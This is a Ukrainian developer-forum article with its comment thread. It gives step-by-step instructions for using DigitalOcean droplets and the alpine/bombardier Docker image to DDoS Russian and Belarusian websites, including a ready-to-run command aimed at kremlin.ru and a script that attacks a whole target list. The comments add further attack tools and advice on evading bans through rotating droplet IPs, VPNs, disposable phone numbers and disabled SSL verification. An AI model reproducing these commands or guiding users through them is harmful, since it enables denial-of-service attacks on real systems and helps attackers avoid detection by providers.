Тепер і з Digital Ocean: додаємо ще один сценарій DDoS-атаки

Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті.

Привіт усім. Мене звати Богдан. Я бажаю найшвидшої перемоги у війні, тому пропоную допомогти хактивістам покласти інфраструктуру росії та білорусі.

Колеги з DOU уже описали, як DDoSити російські та білоруські сервіси з Amazon, Azure та Oracle. Тепер поговоримо про один з найпопулярніших хостингів — Digital Ocean. Це хмарний інструмент зі зрозумілим інтерфейсом. В хостингу передбачено кредит 100$ на 60 днів.

Реєстрація

Переходимо за посиланням та реєструємо акаунт.

Обираємо спосіб оплати та надаємо дані банківської картки. Digital Ocean зніме та поверне тимчасову плату в 5$. При вписуванні платника картки спочатку пишемо ім’я, а потім прізвище.

Створіть дроплет, оберіть бажаний дистрибутив. Для прикладу я оберу Ubuntu з уже встановленим docker у вкладці marketplace.

Також оберіть

  • мінімальний тариф (5$ на місяць CPU Options Regular Intel),
  • сервер (можна будь-який, найближчий Frankfurt),
  • вказуємо метод аутентифікації (обираємо пароль, так легше), усе інше — за замовчуванням.

Зачекайте створення дроплета та клікніть по ньому. У верхньому лівому куточку оберіть інструмент Console. В цьому випадку усі команди виконуються від імені суперкористувача та нема потреби пам’ятати пароль.

1. git clone — скопіювати git проєкт
2. cd bombardier — зайти в папку bombardier

3. nano resources.txt — відредагувати список ресурсів, задля постійної DDoS-атаки

Пошукайте в інтернеті, або використайте мій список

Nano:

ctrl +o — записати

ctrl +x вийти (при виході залишити те саме ім’я)

4. DDoS одного сайту
docker run -d --rm alpine/bombardier -c 1000 -d 600000h -l http://kremlin.ru

5. DDoS усього списку ./run_all_docker.sh

Перевага пункту 5 — запустив і забув. При необхідності перевірити, чи працює програма docker ps. Якщо статус up — усе працює.

Сподобалась стаття? Натискай «Подобається» внизу. Це допоможе автору виграти подарунок у програмі #ПишуНаDOU

👍ПодобаєтьсяСподобалось15
До обраногоВ обраному3
LinkedIn

Найкращі коментарі пропустити

Несколько дней назад нам удалось провернуть хорошую операцию, она помогла отключить русские компании от финансовых сервисов. Существует довольно немного таких компаний — Wise, Deel, 2Checkout и еще несколько. Бизнес использует эти сервисы для того чтобы платить своим сотрудникам. В ситуации, когда многие российские банки оказались под санкциями и больше не могут работать с WIRE/SWIFT платежами, эти сервисы являлись обходным путем для русских и мы сделали их недоступными для них, всего за два дня. Как это получилось?

Я просто написал друзьям, которые работают в этих компаниях и попросил поговорить с менеджментом, чтобы отключить все денежные переводы в россию. К моему огромному удивлению, это сработало очень хорошо, на следующий день, менее чем через 12 часов, компании начали уведомлять, тех кто пытается отправить деньги в россию, о блокировке переводов и учетных записей. Например, я написал другу, который работает в Wise вот результат — www.reuters.com/...​siness-russia-2022-02-28 Один из моих знакомых провернул примерно тоже самое с компанией Atlassian, вот результат — www.atlassian.com/...​ssian-stands-with-ukraine.

Все, написанное выше, натолкнуло меня на мысль, что можно делать что-то подобное в других сферах. Я бы сказал — во всех сферах. Буквально, мы можем загнать россию назад в каменный век, сделать это быстро и для этого не нужно ждать санкций, ген ассамблею ООН или еще чего-то. У каждого программиста есть друзья, которые работают в в компаниях по всему миру — от Google до Wix, от Oracle до Microsoft. Если мы все попросим наших друзей обратиться к их компаниях и донести до менеджмента информацию о том что происходит в Украине и как они могут помочь прямо сейчас — все получится.

Вы можете взять любую область, критическую для жизнедеятельности россии, и попытаться атаковать ее по похожему сценарию. Например, розничная торговля. Здесь используется довольно широкий спектр сервисов — CRM, ERP, WebShops(WordPress, Magento etc.), нужно выбрать наиболее распространенные в россии продукты. Для этого вам понадобится консультация специалистов в этой области, хотя возможно вы знаете предметную область и являетесь как раз таким специалистом. Если нет, то контактируйте два-три специалиста, если они подтверждают что ваш список софта критический для цепочки поставок выбранной области — поздравляю, вы что-то нащупали! После этого нужно найти хорошие дружественные контакты в компании, которая производит этот софт. Я искал при помощи вот этого поста в ФБ — www.facebook.com/...​e/posts/10228453875598757. Затем, описать ситуацию в Украине, объяснить чего мы пытаемся добиться и попросить отозвать все лицензии на их софт на территориях россии и беларуси. В первом комменте я оставлю письмо другу, которым я пользовался. В случае с SaaS сервисами типа различных CRM это сработает моментально, в случае каких-то сложных on-premise продуктов возьмет какое-то время. Но каждый день с момента отзыва лицензии время будет неумолимо отбрасывать россию в прошлое.

Я бы выделил ключевые системы, которые могут подорвать любую инфраструктуру:
0. Средства разработки, фреймворки, библиотеки UI и серверных компонентов.
1. Базы данных. Oracle уж ушел из России, было бы отлично если бы остальные вендоры последовали за ним
2. ERP — SAP, Oracle, Microsoft...
3. Системы мониторинга сетей
4. Системы управления
5. Системы хранения данных
6. Операционные системы
7. Любой софт который вам придет в голову
Лучше всего искать кирпичики, которые поддерживают инфраструктуру. Но блокировка вообще любого софта безусловно поможет, даже онлайн видеоредакторов или блоггинговых платформ.

Только в Украине 250 000 программистов, давайте сделаем так чтобы каждый программист получил эту информацию. Пожалуйста, обратите внимание, что не все нужные люди есть в ФБ. Многие из них не читают ФБ. Пошарьте информацию через месснджер или отправьте по email своим знакомым разработчикам, менеджерам, тестировщикам, девопсам, маркетологам, копирайтерам.

Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter

Лінк 1. git clone — скопіювати git проєкт невалідний. Змініть, а то на 404 веде

Замінив, навмисно дав неправильну назву

git clone — скопіювати git проєкт помилка в слові bombardier

У меня сняло 5 баксов, а не 1 доллар. Через время вернуло 5 баксов.

Аккаунт лочится сразу как вводишь номер карты (у меня Приват) и не важно через ВПН это делаешь или нет

Так всегда было. Там пейпалом надо платить.

Судячи з коментарів не у всіх вийшло оплатити за допомогою paypal

я собі на віртуалках юзаю цей скріпт, мб комусь буде корисний github.com/avlasenkoev/ddos_script

Я так розумію весь траф йде на cloud fare, тому що всі ресурси за ним. Цікаво можно якось зробити так, щоб cloud fare перестав співпрацювати з кремлем?

Я не знаю як це перевірити. Якщо через Cloudflare, на change org є петиція, але потрібно створити тему на форумі. chng.it/xcq9c5JRhx

в мене iftop показує трафік на ip саме cloud fare, хоча робота ведеться на список сайтів окупантів.

відповідь не дуже зрозуміла, одна справа доступність інтернету, інша захист державної інфраструктури рашистів

Докер відправляє 5-10 запросів і потім процес просто зупиняєтся
imgur.com/a/2hkdixf

Ви впенені що це запроси? Я так розумію це запуск докер процессів, а самі процеси вже валять запроси.

Ну є вихід з терміналу баша, по ходу і процеси не запустилися

Я таким же чином запустив, потім iftop показує мені нетворк траф, до 5 мб вихід та 50-60 вхід.

Цей droplet вроді shared, то він може активність з чужих акаунтів показує

В мене CPU 100% але фіг пойми чи воно щось робить
imgur.com/a/EpXXATz

Воно так навантажене лише при запуску, далі легше. Перевірити чи працюють контейнери — docker ps

Ммм, вроді ранится i.imgur.com/USTQ8tH.png але ті тестові credits вроді не чарджатся imgur.com/a/rCf3ZSV

Є помилка при копіюванні цього репозиторію fatal: unable to access
'https://notabug.org/fantom/bombarder.git/': server certificate verification failed. CAfile: none CRLfile: none

Пофіксав через команду:
export GIT_SSL_NO_VERIFY=1

Shared CPU / Dedicated CPU
Як розумію друге краще?

* В мене в preautherization стояло 5$ при оплаті

зніме та поверне тимчасову плату в 1$.

Привет, у меня есть пара технических вопросов для понимания:
— трафик не из страны владельца ресурса можно легко фильтровать, следовательно необходимо использовать впн, так?
— большинство ресурсов находится на https и требуют сертификат, следовательно запросы летящие без сертификата или на http — отбрасываются сразу, так?

З того що знаю бажано використовувати російський vpn, так краще. Проте можна і інші країни, головне міняти дроплети, оскільки підозріла поведінка з будь якого ip філтрується. Андрій Козачук в коментарях створив по що перестворює та видаляє дроплети автоматично. Про https не знаю

Питання на засипку — а де можно добути ящик сімок моб операторів (не хочу світити свої номера)?

onlinesim.ru
sms-activate.org/ru
але
це російскі сервіси(хоча є і буржуйскі, треба шукати)
вони не безкоштовні

я коли займався трафіком юзав ці сервіси, ряд сайтів вже начебто знають всі ці номера, зробити гугл пошту було халепою

хоча для таких вот сервісів як ошен повинно згодитися
але вам всеодно знадобится світити картку

Можна скористатися bitlaunch.io. Для реєстрації телефон не потрібний, оплата криптою.

Доречі — була інша статя — як налаштувати Амазон для ддосу, але вона вже видалена з Доу.
Хто знає — чому?

У звʼязку з правилами нашого хост-провайдера статтю «Як DDoS-ти з Free Tier з Amazon Cloud» перенесли у Telegraph.

Зберігайте та додавайте у закладки!

👉 dou.ua/goto/aU6x

Привіт всім!
Вже маю змогу приєнатися до Ддосу,
це ще актуально?

Зараз не можу скачати файл

run_all_docker.sh

Допоможіть якось його отримати, будь ласка

В чому проблема? В статті змінив посилання на актуальне (перезалив видалений almerico/bombardier на інший git)

зараз бачу, що він є в репо,
дякую!

cobweb analogue
Importantly! Don’t forget about the enabled VPN, which you need to change from time to time, or Tor Browser, which you need to change from time to time!
eu-people.github.io

Якщо когось ще пускають у Digital Ocen — зробив програму яка автоматично перестворює дроплети, щоб змінювались IP і не було бану. Скомпільована версія і інструкція тут: https//github.com/teslavitas/DigitalOceanOrchestrator/tree/main/builds

Я зовсім нещодавно користуюсь git при git clone отримую помилку
fatal: repository ’github.com/...​trator/tree/main/builds/ not found
Ваш репозиторій приватний?

В посиланні уже скомпільовані файли, а не корінь проекту. Спробуйте таку команду:
gh repo clone teslavitas/DigitalOceanOrchestrator

и да — не банят

А чому і коли вас забанили? З початку війни ddos роблю. Все ок. З цікавого побачив, що Digital Ocean платить 20% податків Україні.

We’ve deemed the activities on the account are in violation of the DigitalOcean user agreement, and your account has been locked and disabled as a result. In ten days, your account will be terminated and your data will be permanently deleted. If you feel it is an error, please reply to this email.

Крутился UAShield и DB1000N

я сделал управление через солт чтоб руками не перезапускать цели. Использую убунту 20. Могу дать скрип по установке всего что нужно и подсоединение к мастеру

Ребят, всем привет!
Завел серваки на DO, но поставил DDoS-Ripper по другой инструкции. Готов запускаться
Дайте пару советов по секьюрности:
— нужна ли удаленка / виртуалка?
— акк пейпал, на который регал DO, личный. Это норм?

Залив bombarder собі, посилання в статті змінив notabug.org/fantom/bombarder

Протестил еще позавчера Digital Ocean (не по этой доке) — действительно все няшно работает, по крайней мере сразу не банят. Видно что трафик генерится огромный (что-то вроде 80-ти мегабит).
Знати б, що вся ця артилерія потрапляє в ціль :)

або як варіант можна використати ось цю ддосилку github.com/arriven/db1000n в тому ж докері, провірив. працює на ура

Самая актуальна координация, на текущий момент это:
— github.com/Arriven/db1000n
— t.me/ddos_separ

Вот как создатели описывают преимущества:
Це програмне забезпечення для координованого проведення ддос атак на інфраструктуру окупанта. Основна перевага цього методу в тому, що користувачам для проведення атак потрібно всього лише запустити програму на ПК, а вся координація буде проводитись і налаштовуватись адмінами за підтримки спеціалістів з кібербезпеки.

Инструкция по использованию: docs.google.com/...​ZJOClHqHOs5cu20Mc/preview либо README репы.

Но это ж не будет работать без VPN..
Любой DDoS не работает без VPN. Вас тупо отсекают по стране.

Есть форк у кого-то?

Несколько дней назад нам удалось провернуть хорошую операцию, она помогла отключить русские компании от финансовых сервисов. Существует довольно немного таких компаний — Wise, Deel, 2Checkout и еще несколько. Бизнес использует эти сервисы для того чтобы платить своим сотрудникам. В ситуации, когда многие российские банки оказались под санкциями и больше не могут работать с WIRE/SWIFT платежами, эти сервисы являлись обходным путем для русских и мы сделали их недоступными для них, всего за два дня. Как это получилось?

Я просто написал друзьям, которые работают в этих компаниях и попросил поговорить с менеджментом, чтобы отключить все денежные переводы в россию. К моему огромному удивлению, это сработало очень хорошо, на следующий день, менее чем через 12 часов, компании начали уведомлять, тех кто пытается отправить деньги в россию, о блокировке переводов и учетных записей. Например, я написал другу, который работает в Wise вот результат — www.reuters.com/...​siness-russia-2022-02-28 Один из моих знакомых провернул примерно тоже самое с компанией Atlassian, вот результат — www.atlassian.com/...​ssian-stands-with-ukraine.

Все, написанное выше, натолкнуло меня на мысль, что можно делать что-то подобное в других сферах. Я бы сказал — во всех сферах. Буквально, мы можем загнать россию назад в каменный век, сделать это быстро и для этого не нужно ждать санкций, ген ассамблею ООН или еще чего-то. У каждого программиста есть друзья, которые работают в в компаниях по всему миру — от Google до Wix, от Oracle до Microsoft. Если мы все попросим наших друзей обратиться к их компаниях и донести до менеджмента информацию о том что происходит в Украине и как они могут помочь прямо сейчас — все получится.

Вы можете взять любую область, критическую для жизнедеятельности россии, и попытаться атаковать ее по похожему сценарию. Например, розничная торговля. Здесь используется довольно широкий спектр сервисов — CRM, ERP, WebShops(WordPress, Magento etc.), нужно выбрать наиболее распространенные в россии продукты. Для этого вам понадобится консультация специалистов в этой области, хотя возможно вы знаете предметную область и являетесь как раз таким специалистом. Если нет, то контактируйте два-три специалиста, если они подтверждают что ваш список софта критический для цепочки поставок выбранной области — поздравляю, вы что-то нащупали! После этого нужно найти хорошие дружественные контакты в компании, которая производит этот софт. Я искал при помощи вот этого поста в ФБ — www.facebook.com/...​e/posts/10228453875598757. Затем, описать ситуацию в Украине, объяснить чего мы пытаемся добиться и попросить отозвать все лицензии на их софт на территориях россии и беларуси. В первом комменте я оставлю письмо другу, которым я пользовался. В случае с SaaS сервисами типа различных CRM это сработает моментально, в случае каких-то сложных on-premise продуктов возьмет какое-то время. Но каждый день с момента отзыва лицензии время будет неумолимо отбрасывать россию в прошлое.

Я бы выделил ключевые системы, которые могут подорвать любую инфраструктуру:
0. Средства разработки, фреймворки, библиотеки UI и серверных компонентов.
1. Базы данных. Oracle уж ушел из России, было бы отлично если бы остальные вендоры последовали за ним
2. ERP — SAP, Oracle, Microsoft...
3. Системы мониторинга сетей
4. Системы управления
5. Системы хранения данных
6. Операционные системы
7. Любой софт который вам придет в голову
Лучше всего искать кирпичики, которые поддерживают инфраструктуру. Но блокировка вообще любого софта безусловно поможет, даже онлайн видеоредакторов или блоггинговых платформ.

Только в Украине 250 000 программистов, давайте сделаем так чтобы каждый программист получил эту информацию. Пожалуйста, обратите внимание, что не все нужные люди есть в ФБ. Многие из них не читают ФБ. Пошарьте информацию через месснджер или отправьте по email своим знакомым разработчикам, менеджерам, тестировщикам, девопсам, маркетологам, копирайтерам.

Це вартує окремого посту на ДОУ та щоб було на головній сторінці.

А есть уже какой-то централизованный список компаний, которые продолжают работать в рашке? если нет — давайте создадим. Я могу создать в своем гугл аккаунте, зашарить с желающими

git clone — скопіювати git проєкт

пише що акаунт заблоковано:
Доступ до цього сховища було вимкнено співробітниками GitHub через порушення умов обслуговування GitHub. Якщо ви є власником репозиторію, ви можете звернутися до служби підтримки GitHub для отримання додаткової інформації.

archive.org/...​ier_-_2022-03-01_20-24-33
Щоб відновити репозиторій, завантажте пакет

wget archive.org/...​022-03-01_20-24-33.bundle

і запустити:

git clone almerico-bombardier_-_2022-03-01_20-24-33.bundle

DO перестав приймати українські картки навіть через PayPal. Якщо у вас є друзі за кордоном, запитайте в них зареєструвати для вас аккаунт та надати доступи.

У меня через PayPal принял, но через впн.

Мені вдалося взяти безкоштовно на тест (3 дні) сервак з російським айпі тут — www.smartape.ru (при чому там 3 ядра, 3 гб раму)
там треба лише підтвердити номер телефону, працює з українським

Вже годин 10 дудосю з нього, поки не заблочили

ось ще декілька варіантів дудосу (перший максимально використовує ресурси та має стресс-тест DNS)

docs.google.com/...​tg#heading=h.fnqju7ho3s62

fer0x.notion.site/...​fd14e4887b41ea23bc5f74bd2

www.smartape.ru/ssd-vps
"«SSD Бізнес > Тест», там навіть більше ніж я написав — 4гб 6 cpu

до речі, мені здається вже 3 дні минуло, а інстанс досі доступний, хм

MonoBank — We encountered an error processing your card. Please try again.

Після реєстрації, аккаунт одразу став заблокованим(

Дивно, проте можна використати будь який інший сервер, наприклад Selectel

This repository has been disabled.

судячі із інших подібних статей, то alpine/bombardier встановиться з хаба докера, а той репо з гіта, заблокований, і не потрібен

Приклад команди для DDoS з контейнера docker run -ti --rm alpine/bombardier -c 200 -d 10s -l http://kremlin.ru
Довідка по роботі контейнера docker run --rm -it alpine/bombardier --help

Є інстанси по $5 замість $6, якщо змінити CPU Options на Regular Intel. Правда не знаю яка у них різниця у швидкодії.

Можу помилятись, але в деяких випадках краще брати не європейський сервер — вони можуть відсікатися по регіону. Singapore?

Лучше всего взять cyberghostvpn и выбрать россию там — с DO работает на ура

Так если включить ВПН на виртуалке то по ssh на нее уже не зайти. Кто знает какие маршруты прописать чтобы при включенном ВПН ssh не отваливался ?

Я использую uashield git — там просто надо запустить и все — идет скоординированная атака
Вообще хочу сделать скрипт чтобы отсылал мне новый айпи, чтобы делать более точечные атаки.

там же ограниченый список раша ip.. есть смысл?

Підписатись на коментарі